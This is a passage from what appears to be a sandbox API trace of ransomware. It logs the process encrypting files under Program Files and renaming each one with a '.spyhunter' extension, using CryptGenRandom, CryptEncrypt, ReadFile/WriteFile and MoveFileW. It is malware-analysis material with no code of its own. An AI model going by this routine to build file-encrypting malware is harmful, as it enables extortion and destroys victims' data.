Office\\Office14\\PUBWIZ\\SIDBAR98.POC.spyhunter") returned 76 [0112.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDBAR98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sidbar98.poc"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDBAR98.POC.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sidbar98.poc.spyhunter")) returned 1 [0112.214] GetProcessHeap () returned 0x2c0000 [0112.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0112.214] GetProcessHeap () returned 0x2c0000 [0112.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0112.214] GetProcessHeap () returned 0x2c0000 [0112.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfffe0 | out: hHeap=0x2c0000) returned 1 [0112.214] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa90 | out: pbBuffer=0x25cfa90) returned 1 [0112.214] GetProcessHeap () returned 0x2c0000 [0112.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0112.214] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa88*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa88*=0x30) returned 1 [0112.214] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBHF.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\savwbhf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0112.251] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBHF.DLL") returned 58 [0112.251] StrStrW (lpFirst="SAVWBHF.DLL", lpSrch=".txt") returned 0x0 [0112.251] GetProcessHeap () returned 0x2c0000 [0112.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.252] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfa4c*=0x2800, lpOverlapped=0x0) returned 1 [0112.257] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.257] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfa4c*=0x2800, lpOverlapped=0x0) returned 1 [0112.257] GetProcessHeap () returned 0x2c0000 [0112.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.257] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.257] WriteFile (in: hFile=0xec, lpBuffer=0x25cfa8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa4c, lpOverlapped=0x0 | out: lpBuffer=0x25cfa8c*, lpNumberOfBytesWritten=0x25cfa4c*=0x4, lpOverlapped=0x0) returned 1 [0112.424] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa4c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa4c*=0x30, lpOverlapped=0x0) returned 1 [0112.424] CloseHandle (hObject=0xec) returned 1 [0112.424] GetProcessHeap () returned 0x2c0000 [0112.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e3f778 [0112.426] wnsprintfW (in: pszDest=0x2e3f778, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBHF.DLL.spyhunter") returned 68 [0112.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBHF.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\savwbhf.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBHF.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\savwbhf.dll.spyhunter")) returned 1 [0112.427] GetProcessHeap () returned 0x2c0000 [0112.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3f778 | out: hHeap=0x2c0000) returned 1 [0112.427] GetProcessHeap () returned 0x2c0000 [0112.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0112.427] GetProcessHeap () returned 0x2c0000 [0112.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfafc0 | out: hHeap=0x2c0000) returned 1 [0112.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa90 | out: pbBuffer=0x25cfa90) returned 1 [0112.428] GetProcessHeap () returned 0x2c0000 [0112.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0112.428] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa88*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa88*=0x30) returned 1 [0112.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\judgesch.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0112.652] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.GIF") returned 66 [0112.652] StrStrW (lpFirst="JUDGESCH.GIF", lpSrch=".txt") returned 0x0 [0112.652] GetProcessHeap () returned 0x2c0000 [0112.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.652] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfa4c*=0xd36, lpOverlapped=0x0) returned 1 [0112.654] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff2ca, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.654] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd36, lpNumberOfBytesWritten=0x25cfa4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfa4c*=0xd36, lpOverlapped=0x0) returned 1 [0112.654] GetProcessHeap () returned 0x2c0000 [0112.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.654] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.654] WriteFile (in: hFile=0x154, lpBuffer=0x25cfa8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa4c, lpOverlapped=0x0 | out: lpBuffer=0x25cfa8c*, lpNumberOfBytesWritten=0x25cfa4c*=0x4, lpOverlapped=0x0) returned 1 [0112.655] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa4c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa4c*=0x30, lpOverlapped=0x0) returned 1 [0112.655] CloseHandle (hObject=0x154) returned 1 [0112.655] GetProcessHeap () returned 0x2c0000 [0112.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0112.655] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.GIF.spyhunter") returned 76 [0112.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\judgesch.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\judgesch.gif.spyhunter")) returned 1 [0112.656] GetProcessHeap () returned 0x2c0000 [0112.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0112.656] GetProcessHeap () returned 0x2c0000 [0112.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0112.656] GetProcessHeap () returned 0x2c0000 [0112.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01840 | out: hHeap=0x2c0000) returned 1 [0112.656] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa88 | out: pbBuffer=0x25cfa88) returned 1 [0112.656] GetProcessHeap () returned 0x2c0000 [0112.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0112.656] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa80*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa80*=0x30) returned 1 [0112.657] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\charitable contributions.accdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0112.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt") returned 90 [0112.662] StrStrW (lpFirst="Charitable Contributions.accdt", lpSrch=".txt") returned 0x0 [0112.663] GetProcessHeap () returned 0x2c0000 [0112.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.663] ReadFile (in: hFile=0xf0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfa44*=0x2800, lpOverlapped=0x0) returned 1 [0112.665] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.665] WriteFile (in: hFile=0xf0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfa44*=0x2800, lpOverlapped=0x0) returned 1 [0112.665] GetProcessHeap () returned 0x2c0000 [0112.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.665] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.665] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfa84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa44, lpOverlapped=0x0 | out: lpBuffer=0x25cfa84*, lpNumberOfBytesWritten=0x25cfa44*=0x4, lpOverlapped=0x0) returned 1 [0112.704] WriteFile (in: hFile=0xf0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa44, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa44*=0x30, lpOverlapped=0x0) returned 1 [0112.704] CloseHandle (hObject=0xf0) returned 1 [0112.708] GetProcessHeap () returned 0x2c0000 [0112.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0112.708] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt.spyhunter") returned 100 [0112.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\charitable contributions.accdt"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Charitable Contributions.accdt.spyhunter" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\charitable contributions.accdt.spyhunter")) returned 1 [0112.709] GetProcessHeap () returned 0x2c0000 [0112.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0112.709] GetProcessHeap () returned 0x2c0000 [0112.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0112.709] GetProcessHeap () returned 0x2c0000 [0112.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35cc60 | out: hHeap=0x2c0000) returned 1 [0112.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa88 | out: pbBuffer=0x25cfa88) returned 1 [0112.709] GetProcessHeap () returned 0x2c0000 [0112.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0112.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa80*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa80*=0x30) returned 1 [0112.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\marketing projects.accdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0112.710] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt") returned 84 [0112.710] StrStrW (lpFirst="Marketing Projects.accdt", lpSrch=".txt") returned 0x0 [0112.710] GetProcessHeap () returned 0x2c0000 [0112.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0112.710] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfa44*=0x2800, lpOverlapped=0x0) returned 1 [0112.905] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.905] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfa44*=0x2800, lpOverlapped=0x0) returned 1 [0112.905] GetProcessHeap () returned 0x2c0000 [0112.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0112.905] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.905] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfa84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa44, lpOverlapped=0x0 | out: lpBuffer=0x25cfa84*, lpNumberOfBytesWritten=0x25cfa44*=0x4, lpOverlapped=0x0) returned 1 [0113.006] WriteFile (in: hFile=0xf0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa44, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa44*=0x30, lpOverlapped=0x0) returned 1 [0113.006] CloseHandle (hObject=0xf0) returned 1 [0113.006] GetProcessHeap () returned 0x2c0000 [0113.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0113.006] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt.spyhunter") returned 94 [0113.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\marketing projects.accdt"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Marketing Projects.accdt.spyhunter" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\marketing projects.accdt.spyhunter")) returned 1 [0113.007] GetProcessHeap () returned 0x2c0000 [0113.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0113.007] GetProcessHeap () returned 0x2c0000 [0113.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.007] GetProcessHeap () returned 0x2c0000 [0113.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca5b40 | out: hHeap=0x2c0000) returned 1 [0113.011] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa78 | out: pbBuffer=0x25cfa78) returned 1 [0113.011] GetProcessHeap () returned 0x2c0000 [0113.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.011] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa70*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa70*=0x30) returned 1 [0113.012] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.sqlserverce.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0113.013] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll") returned 115 [0113.013] StrStrW (lpFirst="Microsoft.Synchronization.Data.SqlServerCe.dll", lpSrch=".txt") returned 0x0 [0113.013] GetProcessHeap () returned 0x2c0000 [0113.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0113.013] ReadFile (in: hFile=0xf0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfa34*=0x2800, lpOverlapped=0x0) returned 1 [0113.086] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.086] WriteFile (in: hFile=0xf0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfa34*=0x2800, lpOverlapped=0x0) returned 1 [0113.086] GetProcessHeap () returned 0x2c0000 [0113.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0113.087] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.087] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfa74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa34, lpOverlapped=0x0 | out: lpBuffer=0x25cfa74*, lpNumberOfBytesWritten=0x25cfa34*=0x4, lpOverlapped=0x0) returned 1 [0113.195] WriteFile (in: hFile=0xf0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa34, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa34*=0x30, lpOverlapped=0x0) returned 1 [0113.196] CloseHandle (hObject=0xf0) returned 1 [0113.196] GetProcessHeap () returned 0x2c0000 [0113.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0113.196] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll.spyhunter") returned 125 [0113.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.sqlserverce.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll.spyhunter" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.sqlserverce.dll.spyhunter")) returned 1 [0113.197] GetProcessHeap () returned 0x2c0000 [0113.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0113.197] GetProcessHeap () returned 0x2c0000 [0113.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.197] GetProcessHeap () returned 0x2c0000 [0113.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e25c68 | out: hHeap=0x2c0000) returned 1 [0113.197] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa70 | out: pbBuffer=0x25cfa70) returned 1 [0113.197] GetProcessHeap () returned 0x2c0000 [0113.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.197] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa68*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa68*=0x30) returned 1 [0113.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.197] GetProcessHeap () returned 0x2c0000 [0113.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.198] GetProcessHeap () returned 0x2c0000 [0113.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c408 | out: hHeap=0x2c0000) returned 1 [0113.198] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa70 | out: pbBuffer=0x25cfa70) returned 1 [0113.198] GetProcessHeap () returned 0x2c0000 [0113.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.198] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa68*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa68*=0x30) returned 1 [0113.198] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.199] GetProcessHeap () returned 0x2c0000 [0113.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.199] GetProcessHeap () returned 0x2c0000 [0113.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c300 | out: hHeap=0x2c0000) returned 1 [0113.199] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa68 | out: pbBuffer=0x25cfa68) returned 1 [0113.199] GetProcessHeap () returned 0x2c0000 [0113.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.199] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa60*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa60*=0x30) returned 1 [0113.199] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.199] GetProcessHeap () returned 0x2c0000 [0113.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.199] GetProcessHeap () returned 0x2c0000 [0113.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9d30 | out: hHeap=0x2c0000) returned 1 [0113.199] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa68 | out: pbBuffer=0x25cfa68) returned 1 [0113.199] GetProcessHeap () returned 0x2c0000 [0113.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.199] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa60*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa60*=0x30) returned 1 [0113.199] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 